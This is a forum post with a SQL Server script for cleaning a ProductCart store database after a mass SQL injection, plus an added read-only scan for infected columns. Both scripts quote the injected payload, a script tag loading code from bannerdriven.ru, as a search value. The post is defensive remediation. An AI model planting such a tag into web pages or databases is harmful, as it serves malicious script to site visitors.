SQL injection victim? |
Author: stsomeware (Newbie) | Joined: 15-April-2009 | Location: Orlando, Florida | Status: Offline | Points: 2
I have written a little SQL query to clean up our database after an attack. I cannot guarantee it will work for anyone else, but I have run it on 2 separate ProductCart stores that I work with and it worked just fine without losing any data. You will just need to change the `<script src=http://www.bannerdriven.ru/ads.js></script>` to the link that has been injected into your database.

Here it is:
```sql
-- Cleanup for a <script ...></script> tag appended to text columns (SQL Server).
-- Set @Payload to the exact tag that was injected into your database.
DECLARE @T sysname, @C sysname, @Payload varchar(255);
SET @Payload = '<script src=http://www.bannerdriven.ru/ads.js></script>';

-- Every text-like column of every user table:
-- xtype 35 = text, 99 = ntext, 167 = varchar, 231 = nvarchar.
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id
      AND a.xtype = 'U'
      AND b.xtype IN (99, 35, 231, 167);

OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- Cut the value off at the last "<script" and keep everything before it.
    -- reverse() puts the last "<script" first, as "tpircs<"; patindex finds
    -- where it starts, and the 6 covers the rest of that reversed tag.
    -- Only rows whose value ends with the injected tag are touched, so a
    -- value hit more than once needs the script run again until 0 rows change.
    EXEC('update [' + @T + '] set [' + @C + '] = left(
              convert(varchar(8000), [' + @C + ']),
              len(convert(varchar(8000), [' + @C + ']))
                - 6 - patindex(''%tpircs<%'', reverse(convert(varchar(8000), [' + @C + ']))) )
          where [' + @C + '] like ''%' + @Payload + '''');
    FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
```
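Before running a blind UPDATE across every text column, it is worth seeing what it would hit. The following is an added example, not part of stsomeware's post or of ProductCart: a read-only dry run over the same sysobjects/syscolumns set that records, per table and column, how many rows contain the injected tag, how many of those do not have it at the very end of the value (the cleanup above strips from the last `<script` to the end, so those rows need a manual look), and one sample value. It assumes SQL Server and that `@Payload` is set to the same tag you would give the cleanup; the `#Infected` temp table name is an arbitrary choice.

```sql
-- Added example: dry run only, nothing is modified.
DECLARE @T sysname, @C sysname, @Payload varchar(255);
SET @Payload = '<script src=http://www.bannerdriven.ru/ads.js></script>';  -- the injected tag

CREATE TABLE #Infected (
    TableName  sysname,
    ColumnName sysname,
    RowsHit    int,            -- rows containing the tag anywhere
    NotAtEnd   int,            -- of those, rows where the tag is not the last thing in the value
    Sample     varchar(300)    -- one affected value, truncated, for eyeballing
);

-- Same column set the cleanup iterates: text, ntext, nvarchar, varchar of user tables.
DECLARE Scan_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id
      AND a.xtype = 'U'
      AND b.xtype IN (99, 35, 231, 167);

OPEN Scan_Cursor;
FETCH NEXT FROM Scan_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- One aggregate per column; HAVING drops columns with no hits so the report stays short.
    EXEC('insert into #Infected
          select ''' + @T + ''', ''' + @C + ''', count(*),
                 sum(case when [' + @C + '] like ''%' + @Payload + ''' then 0 else 1 end),
                 max(left(convert(varchar(8000), [' + @C + ']), 300))
          from [' + @T + ']
          where [' + @C + '] like ''%' + @Payload + '%''
          having count(*) > 0');
    FETCH NEXT FROM Scan_Cursor INTO @T, @C;
END;
CLOSE Scan_Cursor;
DEALLOCATE Scan_Cursor;

-- Columns with the most hits first; any NotAtEnd > 0 means the "strip from the
-- last <script" approach would either miss the tag or clip legitimate data there.
SELECT TableName, ColumnName, RowsHit, NotAtEnd, Sample
FROM #Infected
ORDER BY RowsHit DESC, TableName, ColumnName;

DROP TABLE #Infected;
```

Run this first and keep the output; after the cleanup, run it again and expect an empty result. A value that received the tag more than once will still show up with `NotAtEnd = 0` after one cleanup pass, since the remaining copy is again at the end, so repeat the cleanup until this scan comes back empty.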